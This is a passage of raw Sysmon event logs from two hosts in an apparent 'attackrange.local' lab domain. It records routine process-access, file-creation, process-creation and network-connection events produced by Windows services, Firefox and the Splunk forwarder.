Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb|C:\Program Files\Mozilla Firefox\xul.dll+4025f|C:\Program Files\Mozilla Firefox\xul.dll+1230b8e 10341000x8000000000000000151427Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:10.419{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 354300x8000000000000000151426Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:09.075{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58401-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal7443- 23542300x8000000000000000151425Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:10.268{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3653AFFC1AD7AC64E859DAA9D9D07CEC,SHA256=7999AF00E8E4C8D29A5F7C9CA34DBB060F6A287F97AA4533436E6A877DC5373C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104925Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:11.891{54715871-FD16-60C9-0B00-00000000CF01}6245484C:\Windows\system32\lsass.exe{54715871-FD14-60C9-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000151446Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.319{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBFD592442300ED733F09C01AF26685E,SHA256=1F9F70F74665B2A107603DD2B144C5CF72D5AC9BDB9D90694BC90D5F5EA8C88B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151445Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7123-60CA-210D-00000000D101}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151444Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151443Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151442Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151441Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151440Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-7123-60CA-210D-00000000D101}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151439Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.249{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7123-60CA-210D-00000000D101}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151438Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.250{39BD8DE3-7123-60CA-210D-00000000D101}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104935Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.997{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CEF9267340ABC6FF8A6AE01BC1BEAB81,SHA256=DB33A6A12316DC0A0EEB22769E5F29A3661109B4861223E8C815C3C1A9B41E88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104934Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.993{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7124-60CA-2F13-00000000CF01}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104933Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.991{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104932Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.991{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104931Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.990{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104930Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.990{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104929Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.990{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7124-60CA-2F13-00000000CF01}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104928Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.990{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7124-60CA-2F13-00000000CF01}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104927Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.989{54715871-7124-60CA-2F13-00000000CF01}2972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104926Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.298{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B78C2F144958F405DE55B7E10EFA138,SHA256=AA12B263B3A009C5A63F2FF44BE79F2CAE777C2FC7722A5C616762017499B903,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151452Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:12.972{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151451Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:12.972{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151450Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:12.972{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151449Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:12.790{39BD8DE3-0F65-60CA-1200-00000000D101}960NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=3B5F0EEC16F29F0EF90BE72AB661EF85,SHA256=802A65BD4E0127A576C8E0CC0C8262636923BA847BCD951342D6361700DA971B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151448Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:12.353{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F98746617277EF6E8388045A69E65581,SHA256=4FA3B4DB0DAD2590941A254691E8BB6FB61377A6FFB3A301F2E128BFE97A803A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151447Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:12.253{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=425C7C9BDAE7649E25BA88BEFDAB5C24,SHA256=520C42CA96947C9A3887A497FF47828980ABA49DBED69B2D0E6D993FF88E25D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104942Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:13.712{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DF120FB200743B33905E698E273BA4,SHA256=10B27259D6B91A21DE72ED24528665B808F37C7D7C91485A882A93705FDC7CE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104941Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:11.578{54715871-FD14-60C9-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55418-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local445microsoft-ds 354300x8000000000000000104940Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 